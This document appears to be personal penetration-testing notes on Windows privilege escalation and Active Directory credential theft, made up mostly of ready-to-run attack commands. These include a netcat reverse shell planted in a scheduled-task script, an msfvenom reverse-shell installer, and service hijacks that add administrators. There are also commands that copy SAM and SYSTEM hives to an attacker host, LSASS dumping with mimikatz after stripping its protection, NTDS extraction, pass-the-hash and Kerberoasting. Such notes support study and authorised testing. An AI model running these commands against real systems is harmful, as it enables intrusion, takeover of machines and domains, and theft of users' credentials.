Windows Privilege Escalation

Links

• Fundamentals
• PowerShellEmpire
• JAWS
• winpeas
• privescheck
• windows exploit suggester
• hacktricks

Account Types

• Administrator local & domain
• Standard local & domain
• Guest
• System, local system, final escalation
• Local Service, got anonymous connections over network.
• Network Service, default service account, authentication via network

Enumeration

Users & Groups

whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta

Files

• powershell

System

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

• Installed software, check for existing exploits

wmic product get name,version,vendor

• Services

wmic service list brief | findstr  "Running"

Logfiles and Registry

cmdkey /list

• Keys containing passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

AD Credentials

• Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain)

Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description

NTDS

• Check user description of AD users
• NTDS consists of three tables
  • Schema
  • Link
  • Data type
• Located under C:\Windows\NTDS
• File is locked by AD at runtime
• A System Bootkey is need to dump the NTDS

Exploit

• Use found credentials

runas /savecred /user:<domain\user> reverse_shell.exe

DLL Hijacking

• DLL hijacking

Unquoted Service Path

• unquoted service path

Token Impersonation

• SeImpersonatePrivilege is necessary, check via whoami priv
• Hot Potato is best before Server 2019 and Windows 10 (version 1809)
• Potatos
• itm4n

Schedules Tasks

• schtasks and schtasks /query /tn %TASK_NAME% /fo list /v
• Autoruns64.exe

MSI Elevated Installer

• Always install elevated

accesschk64 Permissions

• Check access to files and folders

accesschk64 -wvu "file.exe"

• If permission SERVICE_CHANGE_CONFIG is set

 sc config <service> binpath="net localgroup administrators user /add"

• Service escalation
• Any other binary works as well. Copy the compiled portable executable from the service_escalation onto the binary path.Restart the service afterwards.

accesschk64 for Services

accesschk64 -qlc "service.exe"

• If permission SERVICE_ALL_ACCESS is set it is configurable upload a reverse shell

icacls C:\Windows\Temp\shell.exe /grant Everyone:F

• Reconfigure and restart service

sc config TheService binPath= "C:\Path\to\shell.exe" obj= LocalSystem
sc stop TheService
sc start TheService

Startup Application

• Put reverse shell instead of an executable inside C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Password Mining

• Set up metasploit

use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass

• Visit site on target

Unattended Windows Installation

• Investigate the following paths to potentially find user credentials

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

• Watch out for the <Credentials> tags

Powershell History file

Get-Content %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Internet Information Services (IIS)

• Default web server on windows
• Paths containing credentials are the following

C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Putty

• Saved proxy password credentials may be found via

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "ProxyPassword" /s

schtask and icacls

• Check schtasks /query /tn %TASK_NAME% /fo list /v
• Check script for scheduled tasks, F means full access

icacls <PathToScript>

• Put payload inside the script

echo "C:\tmp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" > <PathToSript>

• Run the task

schtasks /run /tn <taskname>

Always Installs Elevated

• These should be set

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

• Craft *.msi file with a payload

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi

• Upload and execute via

msiexec /quiet /qn /i C:\Windows\Temp\wizard.msi

Service Misconfiguration

• Check services, watch out for BINARY_PATH_NAME and SERVICE_START_NAME

sc qc apphostsvc

• Check found permissions via

icacls <BINARY_PATH_NAME>

• If the service binary path is writeable move the payload to its path and grant permissions

icacls <Payload_Service.exe> /grant Everyone:F

sc stop <service>
sc start <service>

• Catch the reverse shell service

Others ways are: * Discretionary Access Control (DACL) can be opened via right click on the service and go to properties * All services are stored under HKLM\SYSTEM\CurrentControlSet\Services\

Unquoted Service Path

• If BINARY_PATH_NAME spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.
• A created directory at install time inherits the permissions from its parent. Check it via

icacls <directory>

• Use service-exe payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path
• Set permissions

icacls C:\Path/to/service.exe /grant Everyone:F

Permissions

• priv2admin
• whoami /priv

SeBackup / Restore

• If SeBackup / SeRestore (rw on all files) is set an elevated cmd.exe may be opened
• Download SAM and System hashes

reg save hklm\system C:\Windows\Temp\system.hive
reg save hklm\sam    C:\Windows\Temp\sam.hive

• or

copy C:\Windows\System32\config\sam \\ATTACKER_IP\

• Start smb server on attack machine

copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
copy C:\Windows\Temp\system.hive \\ATTACKER_IP\

• Dump the hashes

secretsdump.py -sam sam.hive -system system.hive LOCAL

• or meterpreter on target

hashdump

• Use pass the hash to login

psexec.py -hashes <hash> administrator@$TARGET_IP

SeTakeOwnership

• If SeTakeOwnership is set one can take ownership of every file or service.

takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant <user>:F
copy cmd.exe utilman.exe

• Log out, on the Login screen click on Ease of Access

SeImpersonate / SeAssignPrimaryToken

• It is a rouge potato
• Execute process as another user
• Service accounts operate through impersonation
• Check privileges via whoami /priv for these
• Object Exporter Identifier (OXID) is executed as via DCOM as a resolver on port 135 to socket of attacker

socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234

• Catch the potatoe executable from target via netcat

Volume Shadow Copy Service

• Take a look at the volumes at

vssadmin list shadows

• Copy sam and system from the shadow copy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\

Dump LSASS

• If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking lsass.exe -> creat dumpfile

• Use procdump.exe from sysinternal suite as an alternative to tskmgr.exe

• Extract the dump via mimikatz

privilege::debug
sekurlsa::logonpasswords

LSASS Protection

The bypass is needed most of the time in order to dump passwords * If the dump cannot be created because it is protected change RunAsPPL DWORD to 0 under

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

• Alternatively, use mimikatz

privilege::debug
!+
!processprotect /process:lsass.exe /remove

• +! calls mimidrv.sys, therefore mimikatz has to be executed inside the same directory the this file lies

Windows Credential Manager

• Can be found via Control Pane -> User Accounts -> Credential Manager
• Alternatively, command line can be used

vaultcmd /list
vaultcmd /listproperties:"Web Credentials"
vaultcmd /listcreds:"web credentials"

• Extract the password via powershell script Get-WebCredentials from nishang

powershell -ex bypass
Get-WebCredentials

• Via mimikatz if administrative permissions have been gained

privilege::debug
sekurlsa::credman

Ntdsutil

• If administrative permissions on the DC have been gained this can be done
• Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)

Locally extracting ntds.dit

• This can be done to gather the system boot key
• No AD credentials are needed

• Three files are needed

  • C:\Windows\NTDS\ntds.dit
  • C:\Windows\System32\config\SYSTEM
  • C:\Windows\System32\config\SECURITY

• Locally dumping all three needed file is done via

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q"

• Use secretsdump to extract ntds.dit

secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local

Remotely dumping ntds

• Needs the following AD credentials

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes in Filtered Set

• Mimikatz or impacket can be used to gain credentials

• Impacket's secretsdump.py via

secretsdump.py -just-dc <domain>/<AD_Admin_User>@$DC_IP
secretsdump.py -just-dc-ntlm <domain>/<AD_Admin_User>@$DC_IP

Local Administration Password Solution (LAPS)

• This is possible if the user which credentials we posses is member of the group to make password changes

• Replaces GPP, see below

• There are two interesting attributes

  • ms-mcs-AdmPwd contains plain text password of the local Administrator
  • ms-mcs-AdmPwdExpirationTime contains the expiration date of the admin password

• admpwd.dll is used to update the password inside ms-mcs-AdmPwd

  • If LAPS is enabled the dll can be found in C:\Program Files\LAPS\CSE

• List the cmdlets for LAPS

Get-Command *AdmPwd*

• Find the Organisational Unit with extended rights and take a look at the group under ExtendedRightsHolder in the output

Find-AdmPwdExtendedRights -Identity <OU>

• Enumerate which hosts have LAPS enabled
• Impersonate the user and execute the following which displays the password

Get-AdmPwdPassword -ComputerName <targethost>

• Use the property name displayed under ExtendedRightsHolder to enumerate groups and their users

net groups <ExtendedRightsHolder>
net user <GroupMemberUsername>

Group Policy Preferences

• Provisions administrational groups through the domain via SYSVOL
• Distribution is done through XML files on SYSVOL. These contain a password encrypted with the published private key
• Use Powersploit's Get-GPPPassword to decrypt it

Kerberoasting

• Inital (low level) credentials are needed
• Service Principal Name (SPN) account must be known, e.g. from web IIS user or SQL users

GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>

• Take a look at Name in the output and use it to query a TGS ticket

GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>

• Crack the kerberos hash

hashcat -m 13100 -a0 hash.txt --wordlist <wordlist>

AS-REP Roasting

• Do not require Kerberos pre-authentication must be set on the AD user's account login settings. A password is used instead
• A list of potential users with this configured setting should be gathered

GetNPUsers.py -dc-ip $DC_IP <domain>/ -usersfile users.txt